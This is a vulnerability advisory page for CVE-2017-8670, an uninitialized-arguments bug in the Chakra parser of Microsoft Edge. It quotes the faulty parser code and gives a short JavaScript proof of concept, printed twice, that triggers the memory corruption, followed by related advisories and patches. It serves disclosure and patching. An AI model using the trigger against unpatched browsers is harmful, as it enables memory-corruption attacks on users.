Lucene search
RootSSV:96361HistoryAug 17, 2017 - 12:00 a.m.
Microsoft Edge: Chakra: Uninitialized arguments 2(CVE-2017-8670)
2017-08-1700:00:00
Root
www.seebug.org
15
0.949 High
EPSS
Percentile
99.1%
Similar to the issue #1297 . But this time, it happends in “Parser::ParseFncFormals” with the “PNodeFlags::fpnArguments_overriddenInParam” flag.
template<bool buildAST>
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)
{
...
if (IsES6DestructuringEnabled() && IsPossiblePatternStart())
{
...
// Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.
for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)
{
Assert(lexNode->IsVarLetOrConst());
UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);
lexNode->sxVar.sym->SetSymbolType(STFormal);
if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments)
{
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam; <<------ HERE
}
}
...
...
}
PoC:
function f() {
({a = ([arguments]) => {
}} = 1);
arguments.x;
}
f();
function f() {
({a = ([arguments]) => {
}} = 1);
arguments.x;
}
f();
Related
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2017-08-08 07:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-8670)
2017-08-28 00:00:00
packetstorm
packetstorm
Microsoft Edge Chakra Parser::ParseFncFormals Uninitialized Arguments
2017-08-17 00:00:00
symantec
symantec
Microsoft Edge CVE-2017-8670 Remote Memory Corruption Vulnerability
2017-08-08 00:00:00
zdt
zdt
Microsoft Edge Chakra - Uninitialized Arguments (2) Exploit
2017-08-18 00:00:00
prion
prion
Memory corruption
2017-08-08 21:29:00
Memory corruption
2017-08-08 21:29:00
Memory corruption
2017-08-08 21:29:00
osv
osv
CVE-2017-8641
2017-08-08 21:29:01
CVE-2017-8636
2017-08-08 21:29:00
cve
cve
cvelist
cvelist
kaspersky
kaspersky
nessus
nessus
KB4034658: Windows 10 Version 1607 and Windows Server 2016 August 2017 Cumulative Update
2017-08-08 00:00:00
KB4034674: Windows 10 Version 1703 August 2017 Cumulative Update
2017-08-08 00:00:00
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4034658)
2017-08-09 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4034674)
2017-08-09 00:00:00
mskb
mskb
August 8, 2017—KB4034658 (OS Build 14393.1593)
2017-08-08 07:00:00
August 8, 2017—KB4034674 (OS Build 15063.540)
2017-08-08 07:00:00
talosblog
talosblog
Microsoft Patch Tuesday - August 2017
2017-08-08 11:30:00
trendmicroblog
trendmicroblog